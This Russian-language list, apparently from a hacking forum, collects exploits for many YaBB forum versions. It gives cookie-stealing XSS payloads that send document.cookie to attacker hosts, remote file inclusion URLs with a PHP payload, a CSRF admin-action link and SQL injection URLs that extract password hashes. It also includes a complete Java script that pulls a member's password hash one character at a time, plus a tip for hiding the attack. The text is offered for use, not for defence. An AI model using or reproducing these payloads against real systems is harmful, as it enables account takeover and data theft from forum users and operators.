YaBB 1 Gold
Уязвимость в YaBB(http://www.yabb.org/) позволяет удаленному пользователю вставлять произвольный код сценария в страницы сообщения об ошибках. Уязвимость может использоваться для кражи опознавательных мандатов пользователей YaBB, хранящихся в куки.
Пример:
Код:
http://some.site.com/cgi-bin/YaBB/YaBB. … t>alert()</script>
Описание: атакующий может сконструировать специальную ссылку, содержащую произвольный код сценария, при клике на которую код будет выполнен в браузере пользователя, кликнувшего на эту ссылку
Пример:
Код:
http://www.area51experience.com.ar/foro … n=display;
num=10360245269<Script>location%3d'Http://url/x.php?Cookie%3d'%2b(document.cookie)%3b</Script>
YaBB 1.2
Пример:
Код:
http://site.com/yapBB/include/global.php?GLOBAL[includeBit]=1&cfgIncludeDirectory=http://attacer.com/
Код вставки :
Код:
$dire="/home";
$ob=opendir("$dire");
while($filen=readdir($ob)){
$dire2=realpath("$dire");
if ( is_dir("dire2/$filen") == TRUE ){$d="[Dir]";} else {$d=NULL;}
print "$d $filen
";}
closedir($ob);
?>
YaBB 1.3.2
Описание: Злонамеренный пользователь может опубликовать сообщение, содержащее изображение, которое ссылается на URL, используемый при выполнении административных действий. В результате административное действие будет автоматически выполнено, когда администратор читает сообщения форума.
Пример:
Код:
http://[victim]/YaBB.pl?board=;action=modifycat;id=[cateogoryname];moda=Remove2
YaBB 1.4.0-1.4.1
Описание:Межсайтовый скрптинг обнаружен в сценарии входа в систему
Пример:
Код:
http://example.com/forums/index.php?
board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>
window.location.href(%22http://www.attackersite.example.com/hack.asp?%22%2Bdocument.cookie)</script>
Код:
http://www.area51experience.com.ar/foro … n=display;
num=10360245269<Script>location%3d'Http://url/x.php?Cookie%3d'
%2b(document.cookie)%3b</Script>
SQL
Описание:Проблема обнаружена в сценарии Reminder.php.
Код:
http://www.myserver.com/yabbse/Reminder.php?
searchtype=esearch&user=[yourusername]'%20or%20memberName='[otherusername]
YaBB SE 1.5.1
Описание:Удаленный пользователь может выполнить XSS нападение.
Пример:
Код:
[glow=red);background:url(javascript:alert(document.cookie));filter:glow(color=red,2,300]BigExploit[/glow]
[shadow=red);background:url(javascript:alert(document.cookie));filter:shadow(color=red,left,300]BigExploit[/shadow]
YaBB SE 1.5.5c
Описание:Уязвимость существует из-за недостаточной обработки входных данных в параметре "user" в сценарии Sources/Profile.php
Возможность выполнять SQL команды в базе данных:
Пример:
Код:
http://[host]/index.php?board=&action=viewprofile&user=[код]
YaBB SE 1.5.4, 1.5.5
Описание: Уязвимость обнаружена в параметре 'quote'
Пример:
Код:
http://localhost:8080/yabbse//index.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f 2;action=post;threadid=1;title=Post+reply;quote=-12)+UNION+SELECT+passwd,null,null,null,null,null,null,null,null+FROM+yabbse_members+where+ID_ME
YaBB SE 1.5.4, 1.5.3
Описание: Уязвимость обнаружена в YaBB SE в 'SSI.php'.
Пример:
Код:
http://[target]/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1+OR+1=2)
+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_ BOARD=t.ID_BOARD+AND+lmr.ID_MEN+SELECT+ID_MEMBER,+memberName,null,passwd,null,passwd,null,null,null, null,null,null+FROM+yabbse_members+/*
Код:
http://[target]/yabbse/SSI.php?function=recentTopics&ID_MEMBER =1+OR+1=1)+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_ BOARD=t.ID_BOARD+AND+lmr.ID_MEN+null,null+FROM+yabbse_members+/*
Код:
http://[target]/yabbse/SSI.php?function=welcome&username=evilhaxor&ID_MEMBER=1+OR+1=2)+GROUP+BY+readBy+UNION+SELECT+A SCII(SUBSTRING(realName,1,1)+)+
Эксплойт:
Код:
/*
* YabbSe SQL Injection test code
* The code is very ugly but it works OK
* Use at your own risk.
* compile:
* javac yabb.java
* exec:
* java yabb http://localhost/yabbse/yabbse154/ yabbse_ 1
* parameters are:
* java yabb [url with path] [database_prefix] [ID_MEMBER]
*/
import java.net.*;
import java.io.*;
public class yabb {
public static void main(String[] args) throws Exception {
boolean lastChar = false;
String Key = "";
for ( int count=1; count <= 32 ; count++)
{
URL yabbForum = new URL(args[0] +
"SSI.php?function=welcome&username=evilhaxor&ID_MEMBER=1%20OR%201=2)%20GROUP
%20BY%20readBy%20UNION%20SELECT%20ASCII(SUBSTRING(passwd,"+count+",1)%20)%20
%20,%20%200%20FROM%20"+args[1]+"members%20WHERE%20ID_MEMBER="+args[2]+"/*");
BufferedReader in = new BufferedReader(new
InputStreamReader(yabbForum.openStream()));
String inputLine;
inputLine = in.readLine();
int pos = inputLine.indexOf("action=im");
int pos2 = inputLine.indexOf(" ", pos + 11);
if ( pos < 0 )
{
System.out.println("ERROR: The server doesn't return any data");
System.exit(0);
}
String theNumber = inputLine.substring( pos + 11, pos2);
System.out.println(theNumber + "-" + new
Character((char)Integer.parseInt(theNumber.trim())).toString());
Key += new Character((char)Integer.parseInt(theNumber.trim())).toString();
in.close();
}
System.out.println("Hashed password : " + Key);
}
YaBB 2
В этой версии присутствует XSS. Позволяет украсть куки пользователей.
Код:
[U*L]http://www.[U*L=http://wj.com/style=display:none;background:url(javascript:docum ent.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;) ]wj[/U*L][/U*L]
YaBB SE
SQL Error + XSS(passive 3шт.)
Код:
http://site/forum/index.php?board='
Код:
http://site/forum/index.php?board=1;action=display;threadid='
Код:
http://site/forum<script>alert()</script>
Код:
http://site/forumindex.php?board=1;action=icqpager;UIN=<script>alert()</script>
Код:
http://site/forumindex.php?board=1;action=post;threadid=1;quote=2;title=net</title><script>alert("XSS")</script>
(меняем заголовок страницы на "net" и закрывает тэг заголовка. так мы не светимся. а дальше скрипт для сниффера - как всегда)
Описание:Файл 'Packages.php' включает сценарий 'Packer.php
Пример:
Код:
http://[target]/yabbse/Sources/Packages.php?sourcedir=http://attacker/